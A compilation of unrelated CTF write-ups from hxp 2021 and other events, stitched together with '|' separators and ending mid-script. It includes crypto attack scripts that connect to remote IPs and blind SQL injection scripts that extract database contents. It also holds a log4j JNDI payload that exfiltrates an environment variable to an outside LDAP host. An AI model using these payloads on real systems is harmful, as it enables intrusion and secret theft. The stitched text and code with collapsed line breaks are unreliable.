```consolevagrant@ubuntu-xenial:/vagrant/hxp/unzipper$ bash exploit.sh/vagrant/hxp/unzipper/exploit.dir /vagrant/hxp/unzipper adding: exploit (stored 0%) adding: php:/ (stored 0%) adding: php:/filter/ (stored 0%) adding: php:/filter/convert.base64-encode/ (stored 0%) adding: php:/filter/convert.base64-encode/resource=exploit/ (stored 0%)hxp{at_least_we_have_all_the_performance_in_the_world..._lolphp_:/}
/vagrant/hxp/unzippervagrant@ubuntu-xenial:/vagrant/hxp/unzipper$```
The generated directory containing the zip file and the zipped contents looks like so:
```console$ find exploit.direxploit.direxploit.dir/exploitexploit.dir/exploit.zipexploit.dir/php:exploit.dir/php:/filterexploit.dir/php:/filter/convert.base64-encodeexploit.dir/php:/filter/convert.base64-encode/resource=exploit```
**Flag:** `hxp{at_least_we_have_all_the_performance_in_the_world..._lolphp_:/}`
Full writeup: [https://nandynarwhals.org/hxp-ctf-2021-unzipper/](https://nandynarwhals.org/hxp-ctf-2021-unzipper/) |
The first crypto challenge of this year was rather simple, a weird Diffie-Hellman type thing where not only the private key is private, but also the generator, which is randomly generated from a password every three runs.
def enc(a): f = {str: str.encode, int: int.__str__}.get(type(a)) return enc(f(a)) if f else a
def H(*args): data = b'\0'.join(map(enc, args)) return SHA256.new(data).digest()
def F(h, x): return pow(h, x, q)
password = random.randrange(10**6) def go(): g = int(H(password).hex(), 16)
privA = 40*random.randrange(2**999) pubA = F(g, privA) print(f'{pubA = :#x}')
pubB = int(input(),0) if not 1 < pubB < q: exit('nope')
shared = F(pubB, privA)
verA = F(g, shared**3) print(f'{verA = :#x}')
verB = int(input(),0) if verB == F(g, shared**5): key = H(password, shared) flag = open('flag.txt').read().strip() aes = AES.new(key, AES.MODE_CTR, nonce=b'') print(f'flag:', aes.encrypt(flag.encode()).hex()) else: print(f'nope! {shared:#x}') signal.alarm(2021) go() go() go()
I think we have solved this challenge quite differently than [other](https://github.com/cscosu/ctf-writeups/tree/master/2021/hxp_ctf/gipfel) [teams](https://ctftime.org/writeup/31869). We realized that after one run of the protocol in which the $verB$ check fails the server shares the used $shared$ value which together with $verA$ allows for constructing an offline oracle for testing guesses of the generator $g$ and thus also the `password`. The oracle is based on the equation:\\[ verA = g^{shared^3} \mod q\\]which we can check for all password guesses once we have $verA$ and $shared$ from one `go()` run.
#!/usr/bin/env python3 # Requires pwntools, tqdm, pycryptodome from pwn import * from tqdm import tqdm from Crypto.Hash import SHA256 from Crypto.Cipher import AES from binascii import unhexlify
q = 0x3a05ce0b044dade60c9a52fb6a3035fc9117b307ca21ae1b6577fef7acd651c1f1c9c06a644fd82955694af6cd4e88f540010f2e8fdf037c769135dbe29bf16a154b62e614bb441f318a82ccd1e493ffa565e5ffd5a708251a50d145f3159a5
def enc(a): f = {str: str.encode, int: int.__str__}.get(type(a)) return enc(f(a)) if f else a
def H(*args): data = b'\0'.join(map(enc, args)) return SHA256.new(data).digest()
def F(h, x): return pow(h, x, q)
def solve_pow(server): pow_regex = re.compile(r"\"([0-9a-f]+)\"") bits_regex = re.compile("([0-9]+) zero")
pow_line = server.recvline() pow_challenge = pow_regex.search(pow_line.decode()).groups()[0] pow_bits = bits_regex.search(pow_line.decode()).groups()[0]
pow_proc = subprocess.run(["./pow-solver", pow_bits, pow_challenge], capture_output=True) pow_res = pow_proc.stdout.strip()
server.sendline(pow_res)
def decrypt(password, shared, data): key = H(password, shared) aes = AES.new(key, AES.MODE_CTR, nonce=b'') return aes.decrypt(unhexlify(data))
if __name__ == "__main__": log.info("Precomputing gs") g_options = {} for pw in tqdm(range(10**6)): h = int(H(pw).hex(), 16) g_options[pw] = h
server = remote("65.108.176.66", 1088) log.info("Solving PoW") solve_pow(server) log.success("Solved PoW")
pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)
server.sendline(b"2")
verA = int(server.recvline().strip().decode().split(" = ")[1], 16)
server.sendline(b"2") # This will fail and we will get shared.
shared = int(server.recvline().strip().decode().split("! ")[1], 16) exp = shared**3 % (q-1)
for password, g in tqdm(g_options.items()): if verA == F(g, exp): break log.success(f"We got the g: {g}") log.success(f"We got the password: {password}")
log.info("--- Second run ---")
pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)
privB = 10 pubB = F(g, privB) server.sendline(str(pubB).encode())
verA = int(server.recvline().strip().decode().split(" = ")[1], 16)
shared = F(pubA, privB) assert verA == F(g, shared**3) verB = F(g, shared**5) server.sendline(str(verB).encode())
encrypted_flag = server.recvline().strip().decode().split(": ")[1] log.success(f"The flag is {decrypt(password, shared, encrypted_flag)}")
server.close()
The code above gets the flag in the time limit, as it incorporates a simple speedup to reduce the $shared^3$ exponent modulo $q-1$. |
The solution to the challenge was quite simple. The flag was stored in an environment variable, which hinted at using the log4j exploit that does not achieve RCE but only environment variable exfiltration via a LDAP (or DNS, ...) request. The payload was just the log4j exploit string pointing at this server targeting the flag, however we needed to actually have something to detect the queried LDAP path containing the flag.
${jndi:ldap://neuromancer.sk/${env:FLAG}}
Simply listening on the LDAP port showed some communication from the vulnerable server, but the requested path is not sent in the first request and without a proper LDAP server response the vulnerable service would not send it. We quickly whipped up the first LDAP server that we found [`slapd`](https://www.man7.org/linux/man-pages/man8/slapd.8.html) and after a bit of bumbling around with its configuration to have it run and log, but after checking the syslog, there it was!
Dec 17 16:43:31 Finn slapd[476096]: conn=1001 op=1 do_search: invalid dn: "hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}"
This challenge could have also been solved without the LDAP server, see [here](https://nandynarwhals.org/hxp-ctf-2021-log4sanitycheck/) for example. |
The **kipferl** challenge was very similar to **gipfel** with the only difference being that the finite field Diffie-Hellman was replaced with elliptic curve Diffie-Hellman over a weird curve over the same prime. As our **gipfel** solution only used the group structure and the values $verA$ and $shared$, we could adapt it to also work on **kipferl**. For the **gipfel** solution go [here](https://ctftime.org/writeup/31900). There were a few twists though:
- The generator $G$ could now lie on the original curve or on its twist. This made the simple speedup of **gipfel** above slightly more tricky, as we needed to test where the generator guess is to reduce by the correct order. - The scalar multiplication operations as implemented in the challenge are quite slow, and we needed to run quite a lot of them in the time limit of 2021 seconds.
To address these issues, we precomputed the possible generators for all passwords together with information on whether they lied on the original curve or twist curve and used parallelization for the rest. The script below precomputes generator information in Sagemath.
# Requires tqdm and pycryptodome import json from tqdm import tqdm from Crypto.Hash import SHA256
q = 0x3a05ce0b044dade60c9a52fb6a3035fc9117b307ca21ae1b6577fef7acd651c1f1c9c06a644fd82955694af6cd4e88f540010f2e8fdf037c769135dbe29bf16a154b62e614bb441f318a82ccd1e493ffa565e5ffd5a708251a50d145f3159a5 K = GF(q) a, b = K(1), K(0)
curve = EllipticCurve([a, b])
def enc(a): f = {str: str.encode, int: int.__str__}.get(type(a)) return enc(f(a)) if f else a
def H(*args): data = b'\0'.join(map(enc, args)) return SHA256.new(data).digest()
if __name__ == "__main__": print("Precomputing gs...") gs = {} for pw in tqdm(range(10**6)): g = int(H(pw).hex(), 16) try: curve.lift_x(K(g)) mod = "orig" except: mod = "twist" gs[pw] = { "g": g, "mod": mod }
with open("gs.json", "w") as f: json.dump(gs, f)
Next the actual attack script in Python. We actually reduce by a square root $r$ of the order of the original curve as its group structure is bi-cyclic ($\mathbb{Z}_r \times \mathbb{Z}_r$). With enough cores the script below gets the flag.
#!/usr/bin/env python3 from pwn import * from Crypto.Hash import SHA256 from Crypto.Cipher import AES from binascii import unhexlify from multiprocessing import Pool from tqdm import tqdm import json
q = 0x3a05ce0b044dade60c9a52fb6a3035fc9117b307ca21ae1b6577fef7acd651c1f1c9c06a644fd82955694af6cd4e88f540010f2e8fdf037c769135dbe29bf16a154b62e614bb441f318a82ccd1e493ffa565e5ffd5a708251a50d145f3159a5 a, b = 1, 0 order_orig = 21992493417575896428286087521674334179336251497851906051131955410904158485314789427947788692030188502157019527331790513011401920585195969087140918256569620608732530453375717414098148438918130733211117668960801178110820764957628836 order_sqrt = 4689615487177589107664782585032558388794418913529425573939737788208931564987743250881967962324438559511711351322406 order_twist = 2 * q + 2 - order_orig
################################################################
# https://www.hyperelliptic.org/EFD/g1p/data/shortw/xz/ladder/ladd-2002-it def xDBLADD(P,Q,PQ): (X1,Z1), (X2,Z2), (X3,Z3) = PQ, P, Q X4 = (X2**2-a*Z2**2)**2-8*b*X2*Z2**3 Z4 = 4*(X2*Z2*(X2**2+a*Z2**2)+b*Z2**4) X5 = Z1*((X2*X3-a*Z2*Z3)**2-4*b*Z2*Z3*(X2*Z3+X3*Z2)) Z5 = X1*(X2*Z3-X3*Z2)**2 X4,Z4,X5,Z5 = (c%q for c in (X4,Z4,X5,Z5)) return (X4,Z4), (X5,Z5)
def xMUL(P, k): Q,R = (1,0), P for i in reversed(range(k.bit_length()+1)): if k >> i & 1: R,Q = Q,R Q,R = xDBLADD(Q,R,P) if k >> i & 1: R,Q = Q,R return Q
################################################################
def enc(a): f = {str: str.encode, int: int.__str__}.get(type(a)) return enc(f(a)) if f else a
def H(*args): data = b'\0'.join(map(enc, args)) return SHA256.new(data).digest()
def F(h, x): r = xMUL((h,1), x) return r[0] * pow(r[1],-1,q) % q
def test_F(args): password, g, verA, exp = args out = F(g, exp) if verA == out: return True, password, g else: return False, password, g
def solve_pow(server): pow_regex = re.compile(r"\"([0-9a-f]+)\"") bits_regex = re.compile("([0-9]+) zero")
pow_line = server.recvline() pow_challenge = pow_regex.search(pow_line.decode()).groups()[0] pow_bits = bits_regex.search(pow_line.decode()).groups()[0]
pow_proc = subprocess.run(["./pow-solver", pow_bits, pow_challenge], capture_output=True) pow_res = pow_proc.stdout.strip()
server.sendline(pow_res)
def decrypt(password, shared, data): key = H(password, shared) aes = AES.new(key, AES.MODE_CTR, nonce=b'') return aes.decrypt(unhexlify(data))
if __name__ == "__main__": log.info("Loading gs...") with open("gs.json") as f: gs = json.load(f)
server = remote("65.108.176.252", 1099) log.info("Solving PoW") solve_pow(server) log.success("Solved PoW")
pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)
server.sendline(b"2")
verA = int(server.recvline().strip().decode().split(" = ")[1], 16)
server.sendline(b"2") # This will fail and we will get shared.
shared = int(server.recvline().strip().decode().split("! ")[1], 16) exp_orig = shared**3 % order_sqrt exp_twist = shared**3 % order_twist
tasks = [(int(password), val["g"], verA, exp_orig if val["mod"] == "orig" else exp_twist) for password, val in gs.items()]
pool = Pool() res = pool.imap_unordered(test_F, tasks) for r in tqdm(res, total=len(gs)): if r[0]: password = r[1] g = r[2] pool.terminate() pool.join() break else: log.error("No luck") exit(1) log.success(f"We got the g: {g}") log.success(f"We got the password: {password}")
log.info("---- Second run ----")
pubA = int(server.recvline().strip().decode().split(" = ")[1], 16)
privB = 10 pubB = F(g, privB)
server.sendline(str(pubB).encode())
verA = int(server.recvline().strip().decode().split(" = ")[1], 16)
shared = F(pubA, privB) assert verA == F(g, (shared**3)) verB = F(g, (shared**5))
server.sendline(str(verB).encode())
encrypted_flag = server.recvline().strip().decode().split(": ")[1] log.success(f"The flag is {decrypt(password, shared, encrypted_flag)}")
server.close() |
Each week (7 days) represent a character, and each day contains 2 coordinates or none. This can be addressed using a 7 segment display to draw each character (day 1: segment A, day 2: segment B, etc, see this link: https://en.wikichip.org/wiki/seven-segment_display/representing_letters)
## Flag
CTFUA{dEtIUA} |
# Http flag:Misc:pts
# Solution
OSSのようなファイルが与えられます．`.git/config`ファイルをみましょう．
`url = https://github.com/http-party/http-server.git`
実際のOSSを少し書き換えたようなファイルであることがわかりました．ここで，このレポジトリをcloneして，差分を見てみましょう．
怪しい変更がありました．
```pyprint(''.join(chr(int('010100110100001001000011010101000100011001111011001101110100100000110011010100110011001101011111010011010011000101010011010000110101001101011111010000010101001000110011010111110100011100110000010010010100111001000111010111110101001100110000010111110011001101000001010100110101100101111101'[i*8:i*8+8],2)) for i in range(len('010100110100001001000011010101000100011001111011001101110100100000110011010100110011001101011111010011010011000101010011010000110101001011111010001010010001100110101111101000111001100000100100101001110001110011001101000001010100110101100101111101')//8)))```
フラグが途中までしか出力されません．
`SBCTF{7H3S3_M1SCS_AR3_G0ING_S0`
このプログラムを見てみると，後半の`len`関数の中の文字数に応じて出力される文字数が変わっているようです．適当な文字を追加してみましょう．
```pyprint( "".join( chr( int( "010100110100001001000011010101000100011001111011001101110100100000110011010100110011001101011111010011010011000101010011010000110101001101011111010000010101001000110011010111110100011100110000010010010100111001000111010111110101001100110000010111110011001101000001010100110101100101111101"[ i * 8 : i * 8 + 8 ], 2, ) ) for i in range( len( "0101001101000010010000110101010001000110011110110011011101001000001100110101001100110011010111110100110100110001010100110100001101010010111110100010100100011001101011111010001110011000001001001010011100011100110011010000010101001101011001011111010000000000000000000000000000000000000000000" ) // 8 ) ))```
フラグが出力されました．
## SBCTF{7H3S3_M1SCS_AR3_G0ING_S0_3ASY} |
The provided disk image contains two partitions, the first partition is EFI loaderwith keywords "systemd" and "Arch Linux", the second partition is LUKS-encrypted.
The task also provides network capture with a log of TPM requests and responses.Wireshark has a dissector for TPM2 protocol; the dissector doesn't handleinput and output parameters, leaving all of them as one combined blob,but it is sufficient for this task.
"Measured boot" process sends hashes of everything that is about to executeto the TPM, and then asks for decryption keys. TPM compares those hasheswith those that were previously sealed, and returns requested keys only ifeverything matches and the system was not tampered with. The capture containsseveral TPM2_CC_PCR_Extend requests, eventually followed by TPM2_CC_Unseal(along with some other, irrelevant commands), the key should be in the responseto TPM2_CC_Unseal. Wireshark shows`RESPONSE PARAMS: 0020d57256b7127609a08607f99d6a0b9ff12af45c1c01f7b14322248bfc8072a3d5`when dissecting the response. First two bytes are obviously length in big-endianof the one and only output parameter, and the rest must be a decryption key.(As Part 3 will show, TPM2 protocol has a possibility to encrypt data on-the-wire,but this is not used here.)
Searching for TPM2/unseal/LUKS in systemd sources reveals that the TPM keyis base64-encoded when opening LUKS volume: [https://github.com/systemd/systemd/blob/26b283299254fd0b3a50bb635ac81da1d986d905/src/cryptsetup/cryptsetup-tokens/cryptsetup-token-systemd-tpm2.c#L109](https://github.com/systemd/systemd/blob/26b283299254fd0b3a50bb635ac81da1d986d905/src/cryptsetup/cryptsetup-tokens/cryptsetup-token-systemd-tpm2.c#L109).
Base64 of the key above is `1XJWtxJ2CaCGB/mdaguf8Sr0XBwB97FDIiSL/IByo9U=`;mounting the volume with this as a passphrase succeeds (assuming you don't tryto do it inside [WSL](https://github.com/microsoft/WSL/issues/6584#issuecomment-786652601))and reveals the flag `CTF{The_S3cr3t_could_have_been_encrypted}` in `/flag`plus files for Part 2 and Part 3. |
Looking into the page provided we are presented with a list of records that have some hyperlinks, but only the **View Record** works. Accessing one record:
A **POST** request is executed, which is quite odd. Analysing the source code of the home page, we can see that all the view records have a form that executes a **POST**, and sends a url parameter at the same time.
Fuzzing the url parameter with _sqlmap_ gives no results. Doing the same with a **POST** request sending **id=1** in the body also gives no results. The description talks about wrong sanitization, so there must be a validation put in place that uses **PHP** HTTP GET variable (\$\_GET) and HTTP POST variable (\$\_POST) to validate input.
Let's try something to check this theory:
``` pythonimport requestsimport urllib
payload = urllib.parse.quote_plus(' and 1 = 2')r = requests.post('http://ctf-metared-2021.ua.pt:24003/read.php?id=1'+payload, data={'id':1})print(r.text)```
If we execute this python script the page presented will not bring the information for the record with **id=1**. But if we send ** and 1 = 1** we get the record, so there is a _Blind SQL injection_ vulnerability present.
Now we just need to elaborate the script more. First, let's try get information about the tables. By trial and error, we will see that the DBMS is sqlite.
```pythonimport urllibimport string
# Get the sql from the tablesresult = ''count = 0offset = 0
while True: for char in string.printable: position = len(result) + 1 payload = f" AND '{char}' IN (SELECT SUBSTR(sql,{position},1) FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%' ORDER BY name LIMIT 1 OFFSET {offset})" payload = urllib.parse.quote_plus(payload) r = requests.post('http://ctf-metared-2021.ua.pt:24003/read.php?id=1'+payload, data={'id':1}) if 'randN' in r.text: result += char print(result) count = 0 else: count += 1 if count >= 200: print(f'Table name: {result} Offset: {offset}') result = '' offset +=1
```
This will give us the information about the tables.
Now we just need to get the flag:
```pythonimport urllibimport string
# Get the sql from the tablesresult = ''count = 0offset = 0
while True: for char in string.printable: position = len(result) + 1 payload = f" AND '{char}' IN (SELECT SUBSTR(flag,{position},1) FROM flag)" payload = urllib.parse.quote_plus(payload) r = requests.post('http://ctf-metared-2021.ua.pt:24003/read.php?id=1'+payload, data={'id':1}) if 'randN' in r.text: result += char print(result)
``` |
Connecting to the server, it requested me to give data that makes the last 32 bits of SHA-256 zero when added to the given prefix. I created [a program](https://github.com/mikecat/ctf-writeups/blob/main/2021/20211218_hxp_CTF_2021/CRY/gipfel/get_S_mp.py) to solve this by brute-forcing.(this program looks taking upto 30 minutes to get the answer on my PC. Fortunately the server was patient enough to wait for the answer.)
Dividing `g` with small values, I found that `g` modulo 4 is 1.
Therefore, I calculated the 4th root of `1` modulo `g`. One of the roots is:
```4689615487177589107664782585032558388794418913529425573939737788208931564987743250881967962324438559511711351322406```
Putting this value as `pubB` will make `shared` (`pubB` to the `privA`-th power modulo `g`) be `1` because `privA` is a multiple of 40, which is a multiple of 4.
Then `shared**3` and `shared**5` are also `1`.This means that the value of `g` is printed as `verA` and we can put the value as `verB` to pass the check.
Also knowing that `g` is the SHA-256 of `password`, we can obtain the value of `password` via hashcat.
Now it is easy to obtain the encryption key `key`,which is SHA-256 of a string created by concatenating `password`, `"\0"`, and `shared` (`1`).
Finally it's time to decrypt AES. The encryption is done with `AES.MODE_CTR` and `nonce=b''`. CyberChef asked a 16-byte IV to decrypt in CTR mode. 16 bytes of zero worked as IV. |
# DescriptionSanta has hidden a secret message on the backside of a jigsaw puzzle that he completed. Sadly, one of his elves dropped the completed puzzle, shuffling all the pieces. Can you verify that it is indeed impossible for the Grinch to recover this message?
## SolutionYou were given quite an amount of puzzle pieces, 667 pieces to be exact, in the form of png images. Checking the files with exiftool (or strings which was used in the first palce) relvealed some secret:```Comment : Secret data: 'gI'```Each file had such secret. judging from the charset we deal with base64 encoding (good estimated guess). So next obvious step would be trying to find the correct order of that secret snippets. Since it's a puzzle it might make sense to solve it and then check the pieces for example from top-left to bottom-right to assemble the base64-code-string. Indeed I tried some puzzle solver scripts. But most failed (ether not matching contours exactly, too many pieces whatsoever ... nice try, some learing about python PIL (eg. normalized all images to same height & length, replacing transparent background, writing the secret sting into the image,.. ) but all fails.
After a few days trying web stuff (without much luck) I again checked the jigsaw image directory. Since each png had its sha256 sum as its name I thought we should check that they really match (not sure why I had not done this earlier) but without much surprise they were all fine aka perfect matches. But looking at the list list ordered alphabetically by the checksum what caught my eye next was the timestamps. *ls --full-time* gives you seconds and it didn't look like there was any image with the very same (modification) timestamp. After checking *ls -t* and *ls -rt* it turned out to be quite an easy challenge.
Just reverse order by time and base64 decode the secret string. On the commandline looks like this:
```../jigsaw_pieces$ for f in `ls -1rt`; do exiftool -Comment $f | sed -n "s/.*'\(.*\)'/\1/p"; done|xargs | tr -d ' ' | base64 -d```
output
```
. . _+_ . . . /|\ . * . . . .. i/|\i . . . . // \\* Santa wishes everyone all */( )\\ . the best for 2022 . . i/*/ \ \i *************************** . / /* *\+\ Hopefully you can use this: . . */// + \*\\* AOTW{Sm4ll_p1ec3s_mak3_4_b1g_pic7ure} . i/ /^ ^\ \i . ... . .... . / /+/ ()^ *\ \ ........ . i//*/_^- - \*\i ... .. .. . . / // * ^ \ * \ \ .. i/ /* ^ * ^ + \ \i .. ___ _________ / / // / | \ \ \ *\ >U___^_[[_]| ______ |_|_|_|_|_| ____(|)____ ||| [__________|=|______|=|_|_|_|_|_|= |_____|_____| ||| oo OOOO oo oo oo o-o o-o -| | |-.-|||.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.- |_____|_____|
``` |
The challenge is a FASTQ file. This format is used for DNA and each read (DNA sequence) uses 4 lines:
1. The read ID 2. DNA 3. Nothing important 4. Quality scores
You can solve this using two approaches: 1) identify the read with higher quality scores (everything as I); or 2) getting all DNA sequences and decode them. The encoding map of the ACGT is the following:
- "A":"00" - "C":"01" - "G":"10" - "T":"11" Then, convert the binary to ASCII.
The read with higher quality scores is the following:```CAATCCCACACGCCCCCAACCTGTCGCCCGTGCGATATAACGTGCGCAATACCGTGCGCTCCTTCGTCATAACTAGCGCCCCTTCTCACGGAATCACGTGCCTTCGCACGTGATCACTTC```
The binary representation of this read using this mapping is the following:```010000110101010001000110010101010100000101111011011001010110111001100011001100000110111001100100001100010110111001100111010111110110110100110000011100100110010101011111011101000110100000110100011011100101111101100100011011100011010001111101```
## Flag
CTFUA{enc0nd1ng_m0re_th4n_dn4} |
The hardest part of the challenge is figuring out what the description is trying to say :)
```#!/usr/bin/env pythonimport os
from aiohttp import webfrom stellar_sdk import ( Keypair, Account, TransactionBuilder, Asset, Network, TransactionEnvelope,)from stellar_sdk.exceptions import BadSignatureError
app = web.Application()routes = web.RouteTableDef()
STELLAR_SECRET = os.environ.get("STELLAR_SECRET")FLAG = os.environ.get("FLAG")if STELLAR_SECRET is None or FLAG is None: raise EnvironmentError("Secrets are not set")
# Disabled for now# @routes.post("/prepareorder")async def prepare_order(request: web.Request): data = await request.post() if "address" not in data: return web.Response(status=500, body="Missing destination address")
keypair = Keypair.from_secret(STELLAR_SECRET) account = Account(account=keypair.public_key, sequence=1)
transaction = ( TransactionBuilder( source_account=account, network_passphrase=Network.PUBLIC_NETWORK_PASSPHRASE, base_fee=100, ) .append_payment_op( data["address"], Asset("PIZZA", keypair.public_key), "1" ) .build() ) transaction.sign(keypair) return web.Response(body=transaction.to_xdr())
@routes.post("/submit")async def submit_transaction(request: web.Request): data = await request.post() if "tx" not in data: return web.Response(status=500, body="Missing tx") envelope = TransactionEnvelope.from_xdr( data["tx"], Network.PUBLIC_NETWORK_PASSPHRASE ) if len(envelope.signatures) != 1: return web.Response(status=500, body="Invalid envelope") keypair = Keypair.from_secret(STELLAR_SECRET) try: keypair.verify(envelope.hash(), envelope.signatures[0].signature) except BadSignatureError: return web.Response(status=500, body="Invalid signature") # server = Server(horizon_url="https://horizon.stellar.org") # response = server.submit_transaction(envelope) # return response["flag"] return web.Response(body=FLAG)
@routes.get("/publickey")async def public_key(_: web.Request): keypair = Keypair.from_secret(STELLAR_SECRET) return web.Response(body=keypair.public_key)
@routes.get("/")async def index(request): return web.FileResponse("./index.html")
if __name__ == "__main__": app.add_routes(routes) web.run_app(app, port=25519)```
The code seems solid, so decrypting the description is critical. Fortunately, this is a part of two-series challenge, and the second part has an unusual code that wraps a call to `Keypair.from_secret(STELLAR_SECRET).public_key` in a loop and bails out with 500 if any two iterations disagree with the calculated value. Let's check whether the server always outputs the same value from `/publickey`... there is indeed more than one value.
ed25519 private keys are not actually elliptic-curve private keys (as in "multiplier modulo curve order"); elliptic-curve private key is generated as a hash of ed25519 private key. "Some bytes are erased" may mean "some bytes are replaced by 0x00" or "some bytes are replaced by 0xFF". If hashing does this, the correct multiplier is `x` and a fault changes a single byte, then a faulty multiplier could be `x-256**k*(k-th byte of x)` or `x+256**k*(0xFF-(k-th byte of x))` for some value of `k`; the corresponding faulty public key differs from the correct public key by `256**k*(some byte)*G` (with `G` being the generator point). This gives `32*256` possible points, and it is easy to build a map from these points back to pairs of `(k,byte)`. If the difference `(correct public key) - (faulty public key)` (using elliptic-point subtraction) is in the map, "erasing" replaces with zeroes and we get `k`-th byte of the private multiplier; if `(faulty public key) - (correct public key)` is in the map, "erasing" replaces with FFs and we get 0xFF minus `k`-th byte of the private multiplier which is just as good. One sample shows that the first case happens.
Step 1: collect 33 different outputs of `/publickey`, one true and 32 for every possible index:```b'GCET4VA7665VKBXEY7TQKC64AJ4CZPWBTJ2IKKUSAGZXI5KHMKQL6N7Z' 91b'GASPS2IITBNTPDPKYAKZ7XEMM7WFM267SWFI23CR6B24XRCOMU35OYVB' 7b'GD7AUFO3EIHLLUGIKOFBXYREVBCT66FQJSM5IGSEQETQX5KLDXRTEZJ3' 4b'GDXSGVIKLHLSZLZ7SNVPWNXTWYK2GQAVMPDVGB5Y72ESEFOP3MMDXXDO' 5b'GBZTJZAMFWBVD5ICNDBE5G6Q7HYGU4AFBBFB4TDUFIQW742NKHFNGWAI' 3b'GDV2JQXAGJ3UWC3UJWO4ZYM7E2NTD5TPPKOWV6PG46ZYF33PG5QUHX4B' 3b'GBTRIPZRA74R3BVVWOEWZIVNSOP7OFFS6BPGXSLK7KZ5EWYHNXM4QZI5' 2b'GBIPR4LONIFBGC43DBAGPTKES66TWB5GQIEMYHH3MPFIKRSAGH6A7LSW' 2b'GDMVFYLS4CWSEI6RW3YJNDV6DV36BQXSXDPTRYKRY3UQO64GJLTKMWYP' 3b'GBMT3463RD2J4AAE4S54ZIBR2LYPDAX6KCJ5DB4A3YLEUZDMUO5POV6R' 6b'GCH5OUNOQA5SOXVPTHNNIS3G46PJVZZMBXRLZFDRMXFKV52JCKWYOXZU' 4b'GAXOBBWLIXPOZFRXYBW7HIDWE2QQ6DI6ZDI3U3GVNY2GQZMYPCG3VBQR' 4b'GDY26KIEQJGF5LMZZMSW5PCACI22UTLRVNLTF3HGROOECFONYFEZF3LN' 3b'GAKE4IHQKZ77X67XRGHNK3OK4GVSMKCJOWM4TX7KB7GNRWL3TMMKLTY5' 6b'GCQZYKPIBESD7XUMRVOALOO7UI57WC4H7AODDYD62A2FLI32XV3ZSL6H' 3b'GDF6NHXIGCQ4U2ZS77Q4X7X7Q6D5IIWAFPHWHGSP3KDWVFQLQ3NJHIVK' 1b'GDXXXSYSTW5GV6JXC5K7JEPKL2YRAANNPWKGJ3AR55VELSPO42MHHVTN' 4b'GCJGWW76NYGVOLKFW6U74GMJI7MYNBS4S2FD3HHLXIRDP5GGM4LODGKR' 3b'GBCOTX4GQ3VTZCYM24TOEGX3O4NTD4WSGEEBK7GLSF5XYPJT3ZJ4PPST' 2b'GCML3R42IOVZ7ZFELLJCGV766D4SSL7CWAGM6YB7LV4ZGPWUDOLBLBQD' 3b'GDAHHDXFAEAAPQZIZCVEEFWPJFCWAMFHTAQPQQRU3W4IUL6K6SDGFZLW' 1b'GAS3DVITSEHP4R7QTDPPQLGCVIKWZ63X2JPSEVPTJMFJYGSJAIPEZ3K2' 2b'GDFRYLFO4MRKZQX722NOGHC22G5MA4ERJOIAUSO2TPAKXW7BHQHCCVSD' 3b'GCUPPCGW5CQ45KXY4A3DNNZSJTGHI6CRYXLOOJMPTK7AT6GWMALWAZY6' 2b'GCRD6S7KWAWNGTLSBK4K2VSL2KOIB2YHEFDTKY2IYJUUY4BHPYHZCW5W' 2b'GDLZRKDM5M6W4F5HEZ3XEYSXUTEE7ETDW6AN6FZJ4VI7G6Z3VQK36EJL' 2b'GDNATYJXRJRIP4FMN2RS7PHXVW7UOE4DVZOKJPCVTCFENP57DQGWO7GR' 3b'GASR6SEGRBS7JMVGJIRDU7VCJTZQSFQYVVWR6LVVZRWYNJ322TUBTTCJ' 1b'GA36VBVGF6AAXQZTR6ZJ5B42VCA3TQZEOCIOMKC6JH6SDF7RPPBHO5FF' 6b'GAOJM6HR6AIEYK45PSACEDZ5JA5SEIRIEGHU43XFXWUTGSWA6M6BYQPW' 1b'GDBQOSXNP4NKFAHGB5ADDQLCWC56AHQZXDHKZTUPIXHX6KXD2YCVKMJ6' 1b'GBBS374RPG55QYS73S4V32YDTFY5MLCSCOSYEUIXBSCGG4JKJYRLULLU' 1b'GCZR3XVMG5EDC5NGYAEKJPJSA37V7Y7YZGAUJORSPK2IHJD63DHUDRCJ' 1```(the number shows how many times the particular output has appeared; they show which key is the true one and are rather useless otherwise).
Step 2: build a map of possible points `256**(index)*(byte)*G` and match differences between the true public key and all faulty keys against that map. `EllipticCurve` from SageMath does not handle Edwards curves, so I have taken [https://ed25519.cr.yp.to/python/ed25519.py](https://ed25519.cr.yp.to/python/ed25519.py) (with minor fixes for Python2 -> Python3) for elliptic operations. Stellar public keys have a constant identifier as the first byte and some signature as two last bytes, drop them to obtain elliptic public keys:```import hashlibimport base64import sysimport ed25519
sys.stdout.write("creating mapping")sys.stdout.flush()mapping = {}cur = ed25519.Bfor i in range(32): base = cur for j in range(1,256): mapping[(cur[0],cur[1])] = (i,j) cur = ed25519.edwards(cur,base) sys.stdout.write('.') sys.stdout.flush()assert cur == ed25519.scalarmult(ed25519.B, 1<<(8*32))print("done")
